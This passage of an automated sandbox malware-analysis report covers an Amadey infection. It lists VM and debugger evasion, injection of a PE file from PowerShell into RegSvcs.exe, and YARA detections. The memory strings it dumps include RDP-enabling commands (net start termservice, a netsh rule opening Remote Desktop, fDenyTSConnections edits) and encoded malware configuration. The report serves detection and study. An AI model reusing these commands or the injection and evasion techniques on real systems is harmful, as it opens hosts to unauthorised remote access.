                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 180000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3816Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6018Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4517Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5318Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004093D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,3_2_004093D0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 180000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: Amcache.hve.0.drBinary or memory string: VMware
                Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
                Source: RegSvcs.exe, 00000003.00000002.4127608803.000000000141F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.0.drBinary or memory string: vmci.sys
                Source: Amcache.hve.0.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
                Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001466000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCO=
                Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.0.drBinary or memory string: VMware20,1
                Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042A4A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004362F2 mov eax, dword ptr fs:[00000030h]3_2_004362F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042DE60 mov eax, dword ptr fs:[00000030h]3_2_0042DE60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004407F2 GetProcessHeap,3_2_004407F2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042A4A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A608 SetUnhandledExceptionFilter,3_2_0042A608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00429BB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00429BB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042EE6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042EE6D

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,3_2_00408070
                Injects a PE file into a foreign processes
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 451000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 466000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46D000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46E000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F4C008Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042A68F cpuid 3_2_0042A68F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00442126
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,3_2_00442321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,3_2_004423C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,3_2_00442413
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,3_2_004424AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,3_2_004384BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00442539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,3_2_0044278C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004428B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,3_2_004389DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,3_2_004429B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00442A87
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004296A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,3_2_004296A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,3_2_004061F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043E98E _free,_free,_free,GetTimeZoneInformation,_free,3_2_0043E98E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004091B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,3_2_004091B0
                Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Amadey
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Yara detected Amadeys Clipper DLL
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.powershell.exe.296dbc78c18.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.powershell.exe.296dbc78c18.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Contains functionality to start a terminal service
                Source: powershell.exe, 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: net start termservice
                Source: powershell.exe, 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta60c430246a6b5eabfeff991901daa754340bbf41c5952b1373dfe1ff8834fec26467e7e9fc62574ce418d4877910b7601ae5eMO24EbtoFt4sNNYuNYQCLu7I7fJS4hgVSANTM7pz4ETUJcrrcA==NNTzFs==UtPn5zJkJNQu7I==LNKu7I==YRGoFvFVGRNcOa==RY727PKkEhVZ0K==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxT21dZL==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeOPCc6dBObAZscHFLg0vaXMzCUYGj6fGS6v==UhKvYXQmBuYuBAJISypSJHcEQ1C7UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxciKwSymjFuIbUCyxSVy95SM=UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeNU7c5BwbSgcs0LZDhu==JQKVKNyHNf9BTOBFKV==Xzuy6s==UzYVOs==RVKWaRF8diB8cXF8bYB8Yh 8YSx8cBB8dRT8ZBP8YSN8bCN8bX28ceP=YYynSuUb5Bx3ZWBpdH9pgEvYYYynSuUb5Bw=YXmr6uUb5Bw=Zyt=ZOt=ZOx=ZOB=TRur59==aCG26vdmEr==aCG26zBXEt8=ZS7nZBmuYXQmcCBzbSCrehayLYu34OKRPBB+PBF+LWqu7O3g5iMqKthtIr==fv==JiKw4PF0PL==cX7n5ylqFd5fcAA=aXKA5eKjFuIp0ABsRXK2MeuR4SZgVXpzeLZyXU3c l==UCyxSVy95PRceAJcQQODNTF8NX9heBhhdrY=QSOr6et=SXuB6yKp6Xt0JyBhZl==RQCHOs==UBuwSyt8NXVeeRNpeMo=RBYl7yYpBAdgZa==QQOJMuNyOyYRRRxO0QR1drp5jO==Qha2SyKdSR5f0RM=ThYA7yYlUXYy4yYqQXYv5UGmVXawKyKdSR5f0RM=MytAFrFSGecZPK==chx=dXx=QXYw7yKl7x1PfRFlPnFyiUvQ9MrkcnMpZhYA5KQbRSRcPsFic8Zz4EDocIQwLSWnLNPvEKPkDLeF5UURSR5VMOVpd8FAh0jQ9LZxOixgbYyvEOG97BE2JA9hc1YdNkP8bvulOyxgaRmn5eukSO0dIbPMJUYl7BVpew5Uf2FqTgz8awrvaWJbdBax5aYmRYRgew5zeMNq3UYDA6QNDLdvEKPkEN0=LNPPv9==PYCl6bPoLheySo==QXYw7yKl7x1PfRFlPnFmhFzi9LDkdGhpbdY6EP3U7t1hcXNtM2ZDgETkWRZnZWM=UWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8RWctdMZ54VHEWLRoXEJpbSq37yKpMhFo0K==QXYv6zKRSSJJZQ5lYRylSyKdSXhkbgxsc19AhFDoaSH4dn YeSdyFLxqGyUXOtk5M0b=LSKw4OCmSBUoUWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8WQ9peLZp0kjaXLZfQ05IVAyRMxmNLPRAUVA=UWaVOwKEQzNqchVyc7BY4VOmKsvfU2RsdhalSPC4JhFubQREb2RBgEDVVuPsZGRpVhamSOYAKv==XypyFvp=RBKoRPKj7ANgeBVpcrhEQjfIXMDybHRUaRYwRBKoRPKj7ANgeBVpcrhEQjjIXMDybHRUaRYwUVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYBiMdG4JYVtdgZueK3qhlLf RU=UCyxSzKa7z5ccQY=MepzHI==MepAF9==MepzG9==MepAGI==QYKA6eKl7zJWbQBkXv==Oed8ciKwSymjFuIp0RllLXhiIiGj6Uii4RxnJwcmJHcugQy9IdpoCaqR4R1gcXZ0JIIlOgW7XvLvIA==JdNiKP7g7xI=IdpoCaqpSR4bIxNoBs==UBY5SPyq4BVncw9lfLY=LRK6SOCS7BlqchFvcLpojQzoXLRydGRtaR3wSOF8EPZkcAYgJl==Ib==cX737yGm7X4bMRQgM2UlRy==cYFa6o==chuwSyYkSXK7ReY96hQbUAJ5c8Z52DzoXLnyYWM=MypyFvpRFOk=MypyFvpRFeI=MypyFvpRFeM=MypyFvpRFXY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CBEC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: net start termservice
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CBEC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta60c430246a6b5eabfeff991901daa754340bbf41c5952b1373dfe1ff8834fec26467e7e9fc62574ce418d4877910b7601ae5eMO24EbtoFt4sNNYuNYQCLu7I7fJS4hgVSANTM7pz4ETUJcrrcA==NNTzFs==UtPn5zJkJNQu7I==LNKu7I==YRGoFvFVGRNcOa==RY727PKkEhVZ0K==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxT21dZL==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeOPCc6dBObAZscHFLg0vaXMzCUYGj6fGS6v==UhKvYXQmBuYuBAJISypSJHcEQ1C7UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxciKwSymjFuIbUCyxSVy95SM=UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeNU7c5BwbSgcs0LZDhu==JQKVKNyHNf9BTOBFKV==Xzuy6s==UzYVOs==RVKWaRF8diB8cXF8bYB8Yh 8YSx8cBB8dRT8ZBP8YSN8bCN8bX28ceP=YYynSuUb5Bx3ZWBpdH9pgEvYYYynSuUb5Bw=YXmr6uUb5Bw=Zyt=ZOt=ZOx=ZOB=TRur59==aCG26vdmEr==aCG26zBXEt8=ZS7nZBmuYXQmcCBzbSCrehayLYu34OKRPBB+PBF+LWqu7O3g5iMqKthtIr==fv==JiKw4PF0PL==cX7n5ylqFd5fcAA=aXKA5eKjFuIp0ABsRXK2MeuR4SZgVXpzeLZyXU3c l==UCyxSVy95PRceAJcQQODNTF8NX9heBhhdrY=QSOr6et=SXuB6yKp6Xt0JyBhZl==RQCHOs==UBuwSyt8NXVeeRNpeMo=RBYl7yYpBAdgZa==QQOJMuNyOyYRRRxO0QR1drp5jO==Qha2SyKdSR5f0RM=ThYA7yYlUXYy4yYqQXYv5UGmVXawKyKdSR5f0RM=MytAFrFSGecZPK==chx=dXx=QXYw7yKl7x1PfRFlPnFyiUvQ9MrkcnMpZhYA5KQbRSRcPsFic8Zz4EDocIQwLSWnLNPvEKPkDLeF5UURSR5VMOVpd8FAh0jQ9LZxOixgbYyvEOG97BE2JA9hc1YdNkP8bvulOyxgaRmn5eukSO0dIbPMJUYl7BVpew5Uf2FqTgz8awrvaWJbdBax5aYmRYRgew5zeMNq3UYDA6QNDLdvEKPkEN0=LNPPv9==PYCl6bPoLheySo==QXYw7yKl7x1PfRFlPnFmhFzi9LDkdGhpbdY6EP3U7t1hcXNtM2ZDgETkWRZnZWM=UWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8RWctdMZ54VHEWLRoXEJpbSq37yKpMhFo0K==QXYv6zKRSSJJZQ5lYRylSyKdSXhkbgxsc19AhFDoaSH4dn 